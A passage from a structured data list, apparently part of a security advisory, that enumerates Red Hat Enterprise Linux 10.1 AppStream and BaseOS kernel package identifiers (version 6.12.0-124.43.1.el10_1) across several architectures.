"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
